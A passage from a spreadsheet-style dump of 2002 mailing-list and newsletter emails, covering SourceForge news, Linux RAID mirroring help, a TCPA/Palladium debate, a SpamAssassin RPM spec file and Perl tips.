[URL]http://www.guardian.co.uk[/URL],3604,774190,00.html  Vivendi to Sell $9.8 Billion In Assets, Including Houghton [URL]http://online.wsj.com[/URL],,SB102931297119161715,00.html  (Paid subscription required.)  Ousted Messier Aims To Score $17m Vivendi Pad [URL]http://www.nypost.com[/URL]  Ex-Chief of Vivendi Plans Tell-All Book (Bloomberg) [URL]http://www.nytimes.com[/URL]  			 			 			 			 			 			Other Stories 			 			 			 A Top AOL Manager Has Left Company [URL]http://www.nytimes.com[/URL]  Fed Holds Steady on Interest Rates  [URL]http://www.washingtonpost.com[/URL]  Amtrak halts all high-speed service after finding cracks [URL]http://www.sunspot.net[/URL]  AOL lets resigning exec keep stock options  [URL]http://www.usatoday.com[/URL]  Lucent licensing deal with Winstar focus of probe (AP) [URL]http://www.bayarea.com[/URL]  Study Says Net Could Benefit Music Firms [URL]http://www.latimes.com[/URL]  Eisner Crimping His Own Style [URL]http://www.latimes.com[/URL]  Severance claims by Enron former execs anger ex-workers [URL]http://www.chron.com[/URL]  Princeton removes dean after Yale Web site flap (AP) [URL]http://www.siliconvalley.com[/URL]  Frisbee golf creator dies, may land on someone's roof (SF Chronicle) [URL]http://seattlepi.nwsource.com[/URL]  Will Kinsley's Slate Get Wiped? [URL]http://www.ojr.org[/URL]  Hollywood, Russian Bicker Over Bass [URL]http://www.cnn.com[/URL]  Sponsor 			  				 					 					Do you want to reach the Net's savviest audience? Advertise in Media Unspun. Contact Erik Vanderkolk for details at erikvanderkolk@yahoo.com today. 					 					 			 			 			 			 			 			Staff 			 			 			 			  				 					 					Written by Deborah Asbrand (dasbrand@world.std.com), Keith Dawson (dawson@world.std.com), Jen Muehlbauer (jen@englishmajor.com), and Lori Patel (loripatel@hotmail.com). Copyedited by Jim Duffy (jimduffy86@yahoo.com). Marketing: Cowpoke Productions (cowpokeproductions.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SUBSCRIBE 		 	  Enter your email address in the box below to receive a free four-week trial of Media Unspun:  			 			Add 			 		 	  		 		 		Remove 		 SendasHTML Â  	 	 Newsletter Services Provided by iMakeNews.com   TELL A FRIEND   Powered by iMakeNews.comâ„¢ This email was sent to: zzz-unspun@example.com Click here to be instantly removed from this list.Click here to receive future messages in plain text format.Click here to change your subscriber information and preferences. Â  		    	            ------------=_1029331990-31627-4--</t>
  </si>
  <si>
    <t>http://newsletter.mediaunspun.com www.mediaunspun.com http://www.mediaunspun.com http://pcg.fisherinvestments.com http://online.wsj.com http://tinyurl.com http://www.msnbc.com http://news.com.com http://money.cnn.com http://seattlepi.nwsource.com http://release1.edventure.com http://www.washingtonpost.com http://www.guardian.co.uk http://online.wsj.com http://www.nypost.com http://www.nytimes.com http://www.nytimes.com http://www.washingtonpost.com http://www.sunspot.net http://www.usatoday.com http://www.bayarea.com http://www.latimes.com http://www.latimes.com http://www.chron.com http://www.siliconvalley.com http://seattlepi.nwsource.com http://www.ojr.org http://www.cnn.com http://www.mediaunspun.com http://newsletter.mediaunspun.com http://www.imakenews.com http://www.imakenews.com http://www.imakenews.com http://www.imakenews.com www.mediaunspun.com http://www.mediaunspun.com http://pcg.fisherinvestments.com http://online.wsj.com http://tinyurl.com http://www.msnbc.com http://news.com.com http://money.cnn.com http://seattlepi.nwsource.com http://www.washingtonpost.com http://www.guardian.co.uk http://online.wsj.com http://www.nypost.com http://www.nytimes.com http://www.nytimes.com http://www.washingtonpost.com http://www.sunspot.net http://www.usatoday.com http://www.bayarea.com http://www.latimes.com http://www.latimes.com http://www.chron.com http://www.siliconvalley.com http://seattlepi.nwsource.com http://www.ojr.org http://www.cnn.com http://www.mediaunspun.com http://newsletter.mediaunspun.com</t>
  </si>
  <si>
    <t>To: "" &lt;zzz@example.com&gt;\nFrom: Mailer &lt;noreply@sourceforge.net&gt;\nDate: Wed, 14 Aug 2002 09:32:05 -0700</t>
  </si>
  <si>
    <t>Wed, 14 Aug 2002 09:32:05 -0700</t>
  </si>
  <si>
    <t>Mailer &lt;noreply@sourceforge.net&gt;</t>
  </si>
  <si>
    <t>"" &lt;zzz@example.com&gt;</t>
  </si>
  <si>
    <t>SOURCEFORGE.NET UPDATE: August 14, 2002</t>
  </si>
  <si>
    <t>(You are receiving this email because you subscribed to it (honest). For information on how to unsubscribe please read the bottom of this email). 0. INTRO.  [IBM DB2] 1. INCREASED DOWNLOAD CAPACITY. 2. AUDIO OF KERNEL SUMMIT AVAILABLE. 3. BE A SF.NET FOUNDRY GUIDE. 4. WORK FOR SOURCEFORGE.NET 5. SITE STATISTICS 0. INTRO Hello SourceForge.net Users, This week we've made a big announcement.  As you likely know, any large dynamic website is powered by a database that funnels data to the web servers serving data which ultimately gets sent to you. These databases manage everything from user authentication, session management, site searching, etc.  SourceForge.net is a database- dependent website. Today we have announced that we are moving SourceForge.net to DB2, a powerful relational database by IBM.  We are doing this because the site continues to grow at a rapid rate, with 700 new users and 70 new projects a day, and we need a database that can handle this growth.  We feel that DB2 can do this for us, and IBM is giving us the resources to make this transition successful.  You can read the press release here: [URL]http://www.vasoftware.com[/URL] How will this effect you?  In the first phase, you won't see much difference other then the site will continue to grow and the SourceForge.net team will be able to handle the growth.  In later phases you will see new features on the site that take advantage of the databases advanced capabilities. Today our mail archives have been converted over.  The rest of the site will make the migration to DB2 in the coming months. If you have questions about this or any other aspect of the site, please feel free to email me, pat@sourceforge.net.  I always appreciate the feedback. Thank you for your continued support of SourceForge.net and the Open Source Community. Pat- Patrick McGovern Director, SourceForge.net 1. INCREASED DOWNLOAD CAPACITY SourceForge.net continues to grow, and it's appetite for bandwidth is never-ending.  Every day SF.NET serves over 300,000 files to ensure that developers and end-users within the Open Source community can always obtain the software released by hosted projects, SourceForge.net maintains a network of high-capacity download servers.  These servers are located throughout the world, as to provide better download times regardless of which network provider you are using, and regardless of your geographic location. Three new download servers have recently been added to our network, further strengthening our file serving capabilities.  These latest additions include servers hosted by: Time Warner Telecom (Wisconsin,USA); [URL]http://www.twtelecom.com[/URL] University of Minnesota (Minnesota, USA) [URL]http://www.umn.edu[/URL] CESNET (Czech Republic) [URL]http://www.cesnet.cz[/URL] We thank these sponsors for their commitment to SourceForge.net and the needs of the Open Source community. On a related note, we are looking for a mirror in Japan.  If you are an ISP or University in Japan and are willing to spare 20Mbps for a SourceForge.net mirror (we'll supply the hardware), please let us know at bandwidth@sourceforge.net 2. AUDIO OF KERNEL SUMMIT AVAILABLE SourceForge.net now has the audio from the entire 2002 OSDN/USENIX Kernel Summit, held in June.  Listen to the Linux kernel master discuss such hot topics as kernel modules, virtual memory, block I/O, database scaling, security modules, and async I/O. You may find this audio repository at: [URL]http://linuxkernel.foundries.sourceforge.net[/URL] 3. CONTRIBUTE TO SOURCEFORGE.NET! BE A FOUNDRY GUIDE! Want to contribute to SourceForge.net, but you don't know how to code? Be a foundry guide!  Foundry guides get to hype the cool projects that they think are worth downloading and testing. A guide finds all the stuff on the web about their subject of choice, and gives it prominent placement.  How do you become a foundry guide? Go to [URL]http://foundries.sourceforge.net[/URL]; find a topic that interests you; and send email to foundries@sourceforge.net stating your desired topic and why you are qualified to be a foundry guide. 4. WORK FOR SOURCEFORGE.NET We have a new position for a senior web developer available at SourceForge.net.  We are looking for someone to help us maintain, upgrade, and add new features to SourceForge.net.  Ideal person has 5+ years of development experience on high end, high volume websites (3+ million page views a day).  Has a vast level of knowledge of Internet technologies:  PHP, PostgreSQL, MySQL, DB2, Linux, PERL, Apache, LDAP, Mailman.  A flare for design / UI is a bonus.  SourceForge is a unique site with unique challenges.  We are looking for someone at the top of their game. Location of Job is in Fremont, California.  Please send resume and URL's of sites you have worked on to jobs@sourceforge.net.  Text resumes only.  (No MS WORD files!) 5. SITE STATISTICS Stats: (Monday 12th, 2000) Hosted Projects: 45,194 Registered Users: 465,530 Page Views: 3,344,708 in a single day (Monday) Files transfered in a single day: 340,838 (Monday) Emails sent in a single day from Mailing lists: 851,143 (Monday) Top Ten Projects 1 phpMyAdmin [URL]http://sourceforge.net[/URL] phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW.  Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fields, execute any SQL statement, manage keys on fields. 2 Compiere ERP + CRM Business Solution [URL]http://sourceforge.net[/URL] Smart ERP+CRM solution for small-medium enterprises (SME) in the global marketplace covering all areas from customer management, supply chain and accounting.  For $2-200M revenue companies looking for "brick and click" first tier functionality. 3 SquirrelMail [URL]http://sourceforge.net[/URL] SquirrelMail is a PHP4-based Web email client.  It includes built-in pure PHP support for IMAP and SMTP, and renders all pages in pure HTML 4.0 for maximum compatibility across browsers.  It also has MIME support, folder manipulation, etc 4 TUTOS [URL]http://sourceforge.net[/URL] TUTOS is the ultimate team organization software, a web-based groupware or ERP/CRM system to manage events/calendars, addresses, teams, projects,tasks,bugs,mailboxes,documents and your time spent with these things 5 JBoss.org [URL]http://sourceforge.net[/URL] The JBoss/Server is the leading Open Source, standards-compliant, J2EE based application server implemented in 100% Pure Java 6 Firewall Builder [URL]http://sourceforge.net[/URL] Object-oriented GUI and set of compilers for various firewall platforms.  Currently implemented compilers for iptables, ipfilter and OpenBSD pf 7 openMosix [URL]http://sourceforge.net[/URL] openMosix is a Linux kernel extension for single-system image clustering.  Taking n PC boxes, openMosix gives users and applications the illusion of one single computer with n CPUs. openMosix is perfectly scalable and adaptive. 8 CDex [URL]http://sourceforge.net[/URL] CDex a CD-Ripper, thus extracting digital audio data from an Audio CD. The application supports many Audio encoders, like MPEG (MP2,MP3), VQF, AAC encoders. 9 phpChrystal - An Open Intranet System [URL]http://sourceforge.net[/URL] phpChrystal ist ein OpenSource-Intranetsystem welches vorrangig auf Lan-Partys eingesetzt werden kann.  Vorteile von phpChrystal sind seine Portierbarkeit, Flexibilitt und Performance, da es vollends auf PHP, MySQL und XML basiert 10 Dev-C++ [URL]http://sourceforge.net[/URL] Dev-C++ is an full-featured Integrated Development Environment (IDE) for Win32 and Linux.  It uses GCC, Mingw or Cygwin as compiler and libraries set. More Top Projects: [URL]http://sourceforge.net[/URL] EMAIL LIST REMOVAL: When the SF.NET team sends out a site-wide email, we sometimes see replies that look like this:  "Hey!! I didn't subscribe to this list!!! You spammer. I hate you!  I hate your dog!  (insert other colorful phrases here)".  The truth is, when you registered on SourceForge.net there was a check box that said "Receive Site-wide updates, low volume".  You left it checked when you submitted the registration form, hence you are receiving this email.  We send these updates every 4 to 6 weeks, so it truly is low volume.  However if you want off, this is not a problem.  Simply click on the link below. ================================================================== You receive this message because you subscribed to SourceForge site mailing(s). You may opt out from some of them selectively by logging in to SourceForge and visiting your Account Maintenance page ([URL]http://sourceforge.net[/URL], or disable them altogether by visiting following link:</t>
  </si>
  <si>
    <t>http://www.vasoftware.com http://www.twtelecom.com http://www.umn.edu http://www.cesnet.cz http://linuxkernel.foundries.sourceforge.net http://foundries.sourceforge.net http://sourceforge.net http://sourceforge.net http://sourceforge.net http://sourceforge.net http://sourceforge.net http://sourceforge.net http://sourceforge.net http://sourceforge.net http://sourceforge.net http://sourceforge.net http://sourceforge.net http://sourceforge.net</t>
  </si>
  <si>
    <t>To: "Wynne, Conor" &lt;conor_wynne@maxtor.com&gt;\nFrom: "John P. Looney" &lt;valen@tuatha.org&gt;\nDate: Wed, 14 Aug 2002 09:30:40 +0100</t>
  </si>
  <si>
    <t>Wed, 14 Aug 2002 09:30:40 +0100</t>
  </si>
  <si>
    <t>Re: [ILUG] mirroring on a running system</t>
  </si>
  <si>
    <t>On Wed, Aug 14, 2002 at 09:22:27AM +0100, Wynne, Conor mentioned:\n&gt; When are we going to have a pint? \n\n Tuesday next week. Boars Head, Capel st.\n\nKate\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "'ilug@linux.ie'" &lt;ilug@linux.ie&gt;\nFrom: "Wynne, Conor" &lt;conor_wynne@maxtor.com&gt;\nDate: Wed, 14 Aug 2002 09:22:27 +0100</t>
  </si>
  <si>
    <t>Wed, 14 Aug 2002 09:22:27 +0100</t>
  </si>
  <si>
    <t>I don't see why not John, but I'd sure backup my data first ;--)\n\nSo I suppose you could setup half of the raid1, copy your partitions across,\nvi lilo to append the new device labels, /dev/md0 instead of /dev/hda...\nre-run lilo, then raidhotadd /dev/xxx /dev/md0 [or is that the other way\naround?]\n\nI have never tried this so this could be bollix, I have setup root-raid\nsystems but during install time, I have had drive failures on my\n"production" systems at home and successfully re-built the raid many times.\nIMHO linux software raid is extremely good.\n\nWhen are we going to have a pint? \n\nCW\n\n--------------------------\n I've a running system, and I want to set it up so that the disks are\nmirrored. I'll win a little more read speed, and a lot more reliability.\n\n However, the RAID_HOWTO just mentions RAID 1 and RAID 0 on a machine\nthat's new. They don't mention anything about an existing setup. Is it\npossible to setup disk mirroring on a running box ?\n\nKate\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: Irish LUG list &lt;ilug@linux.ie&gt;\nFrom: "John P. Looney" &lt;valen@tuatha.org&gt;\nDate: Wed, 14 Aug 2002 08:42:53 +0100</t>
  </si>
  <si>
    <t>Wed, 14 Aug 2002 08:42:53 +0100</t>
  </si>
  <si>
    <t>On Tue, Aug 13, 2002 at 04:10:57PM +0100, John P. Looney mentioned: &gt; &gt; I think this procedure is described in the RAID HOWTO for installing a &gt; &gt; new system, but it applies just as well to a running system. &gt;  &gt;  Just double checking (I'd be pissed if I just wiped my installation!)...  Well, this mostly worked, despite Colm saying that "you want the "failed-disk" *instead* of the second "raid-disk", not in addition to it".  I suppose that means instead of: &gt; raiddev /dev/md0 &gt;         raid-level      1 &gt;         nr-raid-disks   2 &gt;         nr-spare-disks  0 &gt;         chunk-size     4 &gt;         persistent-superblock 1 &gt;         device          /dev/hdg3 &gt;         raid-disk       0 &gt;         device          /dev/hda5 &gt;         raid-disk       1 &gt;  &gt;         failed-disk     1  I should have had: &gt; raiddev /dev/md0 &gt;         raid-level      1 &gt;         nr-raid-disks   2 &gt;         nr-spare-disks  0 &gt;         chunk-size     4 &gt;         persistent-superblock 1 &gt;         device          /dev/hdg3 &gt;         raid-disk       0 &gt;         device          /dev/hda5 &gt;         failed-disk     1  It likely means that I was just lucky I put the failed-disk directive after the raid-disk one :)  Anyway. It's doesn't quite boot right, with /=/dev/md0 in fstab. On boot, I see: Partition check:  hda: [PTBL] [2482/255/63] hda1 hda2 hda3 hda4 &lt; hda5 &gt;  hdg: [PTBL] [2434/255/63] hdg1 hdg2 hdg3 floppy0: no floppy controllers found RAMDISK driver initialized: 16 RAM disks of 4096K size 1024 blocksize ide-floppy driver 0.99.newide md: md driver 0.90.0 MAX_MD_DEVS=256, MD_SB_DISKS=27 md: Autodetecting RAID arrays.  [events: 00000000] md: invalid raid superblock magic on hda2 md: hda2 has invalid sb, not importing! md: could not import hda2!  [events: 00000004]  [events: 00000002]  [events: 00000004] md: autorun ... md: considering hdg3 ... md:  adding hdg3 ... md:  adding hda5 ... md: created md0 md: bind md: bind md: running:  md: hdg3's event counter: 00000004 md: hda5's event counter: 00000004 md: RAID level 1 does not need chunksize! Continuing anyway. kmod: failed to exec /sbin/modprobe -s -k md-personality-3, errno = 2 md: personality 3 is not loaded! md :do_md_run() returned -22 md: md0 stopped. md: unbind md: export_rdev(hdg3) md: unbind md: export_rdev(hda5) md: considering hdg1 ... md:  adding hdg1 ... md: created md1 md: bind md: running:  md: hdg1's event counter: 00000002 md: RAID level 1 does not need chunksize! Continuing anyway. kmod: failed to exec /sbin/modprobe -s -k md-personality-3, errno = 2 md: personality 3 is not loaded! md :do_md_run() returned -22 md: md1 stopped. md: unbind md: export_rdev(hdg1) md: ... autorun DONE.  Any ideas why ?  My suspicion is that I've a lack of knowledge about how initrd works, so I'm not sure it's loading it. For a start, the / filesystem is being mounted as ext2, at first, not ext3. It does seem mounted as ext3 after the fsck is done - but that means that it's mounted as ext2 read only, fsck'ed and then remounted ext3. Losing the point of it.  Given I can't pass the kernel parameters (I think), how then can I get it to load the initrd ? Kate --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Seth Johnson &lt;seth.johnson@RealMeasures.dyndns.org&gt;\nDate: Wed, 14 Aug 2002 04:31:22 -0400</t>
  </si>
  <si>
    <t>Wed, 14 Aug 2002 04:31:22 -0400</t>
  </si>
  <si>
    <t>Seth Johnson &lt;seth.johnson@RealMeasures.dyndns.org&gt;</t>
  </si>
  <si>
    <t>TCPA and Palladium: Content Control for the Masses</t>
  </si>
  <si>
    <t>TCPA and Palladium: Content Control for the Masses\n\nWhile security experts poke and jab at what bits and pieces\nof the TCPA and Palladium specs they can get ahold of, they\nhave tended to focus on how they work and what they imply as\nfar as concerns such as privacy and security go, or\nalternatively, in terms of how they would impact the\nfunctionality of the general purpose logic device.  Analysts\nboth favorable and unfavorable have been analyzing them from\nthese standpoints, while paying much less attention to what\nthe proposals imply from the standpoint of what content\ncontrol itself really means.\n\nThe most significant problem with TCPA and Palladium is not\nwhether they may interfere with the power of the universal\nlogic device, or whether they are effectual from the\nstandpoint of privacy and security concerns, though these\nare all very important concerns.  Rather, the fundamental\nproblem they present is in the political premises that they\nhope to implement for the sake of the "content industries."\n\nTCPA and Palladium are the technological realization of the\nconcepts embodied in the WIPO Performances and Phonograms\nTreaty (WPPT), which only came into effect this past May\n20th (with little public notice or fanfare, of course).  The\nWPPT declares an unprecedented "moral right" of authors to\ncontrol public uses of their works.\n\n*That's* the real game plan.\n\nTCPA and Palladium are simply content control for the\nmasses.  They constitute an effort to "democratize" content\ncontrol under the concept of "moral rights," encouraging the\npublic to overlook the clear public interest issues raised\nby the specter of content control, and to confuse these\nissues with private interest issues such as privacy and\nsecurity.  They are an effort to get the public to jump on\nthe bandwagon without adequate consideration of what's\nreally on the line.\n\nIn America, we have never supported the concept of "moral\nrights" which the WPPT professes.  The US Constitution\naccords Congress the power to grant (or deny) exclusive\nrights to works and inventions for the purpose of promoting\nthe progress of the useful arts and sciences, not for the\npurpose of rewarding the originality of creators -- though\nthat result is obviously a consequence of exclusive rights\nstatutes such as copyright law.  Our Supreme Court\nexplicitly articulates this distinction, and for very good\nreason.  In America, we implicitly understand the\ndistinction between expression, the aspect of works to which\ncopyright statute applies, and the facts and ideas that make\nup a work, to which it does *not* apply.\n\nThe reason for this is essential and unavoidable, and must\nbe stated clearly and unequivocally at this juncture:\ninformation is free.  It's not that it *wants* to be -- it\n*is* and it always has been.  This fact is unassailable,\nhowever, unless we let come to pass a world that subscribes\nto "universal content control" for the sake of so-called\n"moral rights" implemented at the behest of narrow content\nindustry interests.\n\nTCPA and Palladium are initiatives that hope to encourage\nthe general public, and more specifically producers of\ninformation products in general, to identify content control\nwith "moral rights," blithely overlooking the real\nimplications of information technology in a free society,\nand the long tradition of American jurisprudence upholding\nthe freedom intrinsic to information, a freedom on which the\nprospects of information technology crucially depend.\n\nSeth Johnson\n\n-- \n\n[CC] Counter-copyright:\n[URL]http://cyber.law.harvard.edu[/URL]\n\nI reserve no rights restricting copying, modification or\ndistribution of this incidentally recorded communication. \nOriginal authorship should be attributed reasonably, but\nonly so far as such an expectation might hold for usual\npractice in ordinary social discourse to which one holds no\nclaim of exclusive rights.\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://cyber.law.harvard.edu http://xent.com</t>
  </si>
  <si>
    <t>To: ILUG@linux.ie\nFrom: Sorin Suciu &lt;ssuciu@sitelite.com&gt;\nDate: Wed, 14 Aug 2002 02:26:19 +0100</t>
  </si>
  <si>
    <t>Wed, 14 Aug 2002 02:26:19 +0100</t>
  </si>
  <si>
    <t>Sorin Suciu &lt;ssuciu@sitelite.com&gt;</t>
  </si>
  <si>
    <t>ILUG@linux.ie</t>
  </si>
  <si>
    <t>[ILUG] Server Partitioning</t>
  </si>
  <si>
    <t>Hi,\nDoes anyone use partitioning on a Linux server? What is the recommended solution? UML? \nCheers,\nSorin\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Victor &lt;victord@paid.com&gt;\nDate: Wed, 14 Aug 2002 02:16:52 -0400</t>
  </si>
  <si>
    <t>Wed, 14 Aug 2002 02:16:52 -0400</t>
  </si>
  <si>
    <t>Victor &lt;victord@paid.com&gt;</t>
  </si>
  <si>
    <t>Problem with my spec file</t>
  </si>
  <si>
    <t>Can someone tell me what I am doing wrong? it's like make doesn't take the PREFIX override... It's crazy. I don't get it... OS: TurboLinux6 rmp3.0.6 make 3.79.1 I just don't get this. It should work... --- %define real_name Mail-SpamAssassin %define real_version 2.31 ######################################################################## # Package Information ######################################################################## Name:         SpamAssassin Version:      2.31 Summary:      SpamAssassin - A perl-based spam filter URL:          [URL]http://www.spamassassin.org[/URL] Group:        Networking/Mail License:      Artistic Release:      1 ######################################################################## # Sources/Patches ######################################################################## Source0: [URL]http://spamassassin.org[/URL]{real_name}-%{real_version}.tar.gz ######################################################################## # Build Configuration ######################################################################## BuildRoot:          %{_builddir}/%{real_name}-%{real_version}-root BuildArchitectures: i586 ######################################################################## # Package Description ######################################################################## %description     SpamAssassin provides you with a way to reduce if not completely eliminate     Unsolicited Commercial Email (SPAM) from your incoming email.  It can     be invoked by a MDA such as sendmail or postfix, or can be called from     a procmail script, .forward file, etc.  It uses a genetic-algorithm     evolved scoring system to identify messages which look spammy, then     adds headers to the message so they can be filtered by the user's mail     reading software.  This distribution includes the spamd/spamc components     which create a server that considerably speeds processing of mail. %prep %setup -q -n %{real_name}-%{real_version} ######################################################################## # Compilation/Installation Instructions (use macros/switches if possible) ######################################################################## %build    %{__perl} Makefile.PL LOCAL_RULES_DIR=/etc/spamassassin INSTALLDIRS=vendor PREFIX=%{_prefix}    make OPTIMIZE="$RPM_OPT_FLAGS" PREFIX=%{_prefix} %install    rm -rf $RPM_BUILD_ROOT    %makeinstall PREFIX=%{buildroot}%{_prefix} \                 INSTALLMAN1DIR=%{buildroot}%{_mandir}/man1 \                 INSTALLMAN3DIR=%{buildroot}%{_mandir}/man3 \                 LOCAL_RULES_DIR=%{buildroot}%{_sysconfdir}/spamassassin    install -m 0711 -D spamd/redhat-rc-script.sh %{buildroot}/etc/init.d/spamassassind %clean    rm -rf $RPM_BUILD_ROOT ######################################################################## # RPM file inclusion section (see CRUX guidelines) ######################################################################## %files %defattr(-,root,root) %attr(0711,root,root) /etc/init.d/spamassassind %attr(0644,root,root) %config(noreplace) /etc/spamassassin/* %attr(0755,root,root) %dir %{_datadir}/spamassassin %attr(0755,root,root) %{_bindir}/* %attr(0644,root,root) %{_datadir}/spamassassin/* %attr(-,root,root) %{_libdir}/* ######################################################################## # Changelog - Keep it short and simple ######################################################################## %changelog * Sun Apr 28 2002 Victor  - Initial Release _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://www.spamassassin.org http://spamassassin.org http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: "Faisal N. Jawdat" &lt;faisal@faisal.com&gt;\nDate: Wed, 14 Aug 2002 02:13:53 -0700</t>
  </si>
  <si>
    <t>Wed, 14 Aug 2002 02:13:53 -0700</t>
  </si>
  <si>
    <t>"Faisal N. Jawdat" &lt;faisal@faisal.com&gt;</t>
  </si>
  <si>
    <t>Re: TCPA and Palladium: Content Control for the Masses</t>
  </si>
  <si>
    <t>&gt; The most significant problem with TCPA and Palladium is not\n&gt; whether they may interfere with the power of the universal\n&gt; logic device, or whether they are effectual from the\n&gt; standpoint of privacy and security concerns, though these\n&gt; are all very important concerns.  Rather, the fundamental\n&gt; problem they present is in the political premises that they\n&gt; hope to implement for the sake of the "content industries."\n\n	I've been thinking about this sort of thing\n	lately, and how the technological realization\n	of these issues is one that enforces *absolute*\n	control of content, where the original legal\n	strictures (copyright) only enforced a limited\n	time limited right to content.\n\n	What I'm wondering is this:  if you give\n	people absolute control of copyright, whose\n	works will be around in 100 years?  Because\n	I'm starting to think that the content\n	creator who wants to produce for posterity\n	had better do it in such a way that the\n	content is *not* "protected", or the content\n	will be inaccessible to people in 15 years,\n	much less 100.\n\n	This of course assumes that the content\n	control mechanisms aren't so pervasive that\n	one *cannot* create content without going\n	through controlled channels.\n\n	-faisal\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Wed, 14 Aug 2002 02:00:29 +0000</t>
  </si>
  <si>
    <t>Wed, 14 Aug 2002 02:00:29 +0000</t>
  </si>
  <si>
    <t>[use Perl] Stories for 2002-08-14</t>
  </si>
  <si>
    <t>use Perl Daily Newsletter\n\nIn this issue:\n    * Apress Publishes 'Writing Perl Modules for CPAN'\n    * Lessig's 'Freeing Culture' Keynote Online\n\n+--------------------------------------------------------------------+\n| Apress Publishes 'Writing Perl Modules for CPAN'                   |\n|   posted by pudge on Tuesday August 13, @09:50 (books)             |\n|   [URL]http://use.perl.org[/URL]              |\n+--------------------------------------------------------------------+\n\n[0]samtregar writes "My new book, [1]Writing Perl Modules for CPAN, is\nnow available. If you ever wanted to learn to write modules and release\nthem on CPAN, now is the time. For experienced module makers, the book\noffers advanced training in XS, Inline::C and CGI::Application. You can\n[2]read the first chapter online for free. The book is shipping now from\n[3]Amazon, [4]BN and others."\n\nDiscuss this story at:\n    [URL]http://use.perl.org[/URL]\n\nLinks:\n    0. mailto:sam@tregar.com\n    1. [URL]http://apress.com[/URL]\n    2. [URL]http://apress.com[/URL]\n    3. [URL]http://www.amazon.com[/URL]\n    4. [URL]http://search.barnesandnoble.com[/URL]\n\n\n+--------------------------------------------------------------------+\n| Lessig's 'Freeing Culture' Keynote Online                          |\n|   posted by KM on Tuesday August 13, @11:27 (links)                |\n|   [URL]http://use.perl.org[/URL]              |\n+--------------------------------------------------------------------+\n\n[0]Ask writes "Leonard Lin put up [1]Lawrence Lessig's Freeing Culture\nkeynote from OSCON. It's excellent. It's great. It's the slides with\naudio in flash. So download that flash player already and click the url.\nI also [2]mirrored it at perl.org. You still here? See it already, you\n*will* be entertained. Near the end of the keynote Lessig asked how many\nhad donated to the EFF. Many hands went up. We felt great. 'Yeah, we're\nhelping!' Then he asked how many had donated more than they spend on\ntheir broadband connection... I don't think I was alone in feeling a bit\nbusted. :-)"\n\nDiscuss this story at:\n    [URL]http://use.perl.org[/URL]\n\nLinks:\n    0. [URL]http://www.askbjoernhansen.com[/URL]\n    1. [URL]http://randomfoo.net[/URL]\n    2. [URL]http://www.perl.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apress.com http://apress.com http://www.amazon.com http://search.barnesandnoble.com http://use.perl.org http://use.perl.org http://www.askbjoernhansen.com http://randomfoo.net http://www.perl.org http://use.perl.org</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Wed, 14 Aug 2002 02:00:22 +0000</t>
  </si>
  <si>
    <t>Wed, 14 Aug 2002 02:00:22 +0000</t>
  </si>
  <si>
    <t>[use Perl] Headlines for 2002-08-14</t>
  </si>
  <si>
    <t>use Perl Daily Headline Mailer\n\nApress Publishes 'Writing Perl Modules for CPAN'\n    posted by pudge on Tuesday August 13, @09:50 (books)\n    [URL]http://use.perl.org[/URL]\n\nLessig's 'Freeing Culture' Keynote Online\n    posted by KM on Tuesday August 13, @11:27 (link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David Raistrick &lt;drais@wow.atlasta.net&gt;\nFrom: Stephane Lentz &lt;Stephane.Lentz@ansf.alcatel.fr&gt;\nDate: Wed, 11 Sep 2002 23:53:41 +0200</t>
  </si>
  <si>
    <t>Wed, 11 Sep 2002 23:53:41 +0200</t>
  </si>
  <si>
    <t>David Raistrick &lt;drais@wow.atlasta.net&gt;</t>
  </si>
  <si>
    <t>Re: [SAtalk] Re: [SAdev] File::Spec and v2.41</t>
  </si>
  <si>
    <t>On Wed, Sep 11, 2002 at 01:46:19PM -0700, David Raistrick wrote:\n&gt; On Wed, 11 Sep 2002, Stephane Lentz wrote:\n&gt; \n&gt; &gt; =&gt; I faced a similar problem with the FreeBSD when trying to \n&gt; &gt; install SpamAssassin through the ports on my fresh FreeBSD 4.6.2. \n&gt; &gt; I had to define PERL5LIB with some given order of directories\n&gt; &gt; so that the latest File::Spec module get used. \n&gt; \n&gt; Good to hear it's not just me.  Mind telling me how you set PERL5LIB\n&gt; specificly? I've tried a few things (setenv in the shell, as well as\n&gt; $PERL5LIB == ...inside the Makefile.PL, even on the perl command\n&gt; line..) with no success.\n&gt; \n- Presuming your run Bash  :\nNote the directory lists \n#  perl -e 'map { print "$_\n" } @INC'\nThen set up the Shell variable PERL5LIB variable (and put it in some .bashrc \nfor future use)\n# export PERL5LIB="directory1:directory2:directory3:directory4"\nThen try to install the software\n\nPERL5LIB is explained perlrun(1) : do \n# man perlrun for more information\n\nRegards, \n\nSL/\n---\nStephane Lentz / Alcanet International - Internet Services\n\n\n-------------------------------------------------------\nIn remembrance\n[URL]www.osdn.com[/URL]\n_______________________________________________\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>www.osdn.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: &lt;fork@spamassassin.taint.org&gt;\nFrom: "Geege Schuman" &lt;geege@barrera.org&gt;\nDate: Wed, 11 Sep 2002 21:39:08 -0400</t>
  </si>
  <si>
